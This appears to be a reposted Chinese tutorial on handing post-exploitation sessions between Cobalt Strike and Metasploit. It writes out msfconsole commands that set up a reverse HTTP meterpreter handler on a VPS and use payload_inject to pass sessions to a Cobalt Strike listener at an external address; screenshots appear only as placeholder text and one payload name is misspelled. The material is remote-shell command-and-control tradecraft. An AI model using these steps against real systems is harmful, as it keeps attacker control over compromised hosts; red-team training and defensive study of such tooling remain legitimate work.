Cobalt Strike获得shell之后 如何与msf联动

2021/10/11 7:14:17

本文主要是介绍Cobalt Strike获得shell之后 如何与msf联动,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

本机做cs,vps做msf

1.Cobalt Strike派生会话给Metasploit

(1)对msf进行设置
使用xshell连接vps,进入msfconsole
对msf的设置如下:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reversez_http
set lhost 172.(这边的ip是服务器的内网地址)
set lport 7777

在这里插入图片描述(run)
(2)对cs进行设置
先设置一个新的监听,这边的IP地址为服务器的外网地址,payload为foreign HTTP,因为此cs不支持直接使用TCP,所以走HTTP的协议(上面的msf也是设置为http)
在这里插入图片描述
右击选择spawn(获得会话)功能,选择刚刚建立的监听器
在这里插入图片描述在这里插入图片描述可以看到msf界面如下,msf获得会话
在这里插入图片描述可以尝试执行命令:
在这里插入图片描述

2.Metasploit派生会话转交给Cobalt Strike

(1)在cs新建一个监听
在这里插入图片描述

(2)msf设置cs正在监听的地址和端口

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true(禁用handler监听,因为我们已经建立监听了所以不用新建)
set lhost 47.
set lport 8088

在这里插入图片描述

在这里插入图片描述在这里插入图片描述
此时在cs可以看到msf传递的派生出来的新的会话了!

在这里插入图片描述



这篇关于Cobalt Strike获得shell之后 如何与msf联动的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程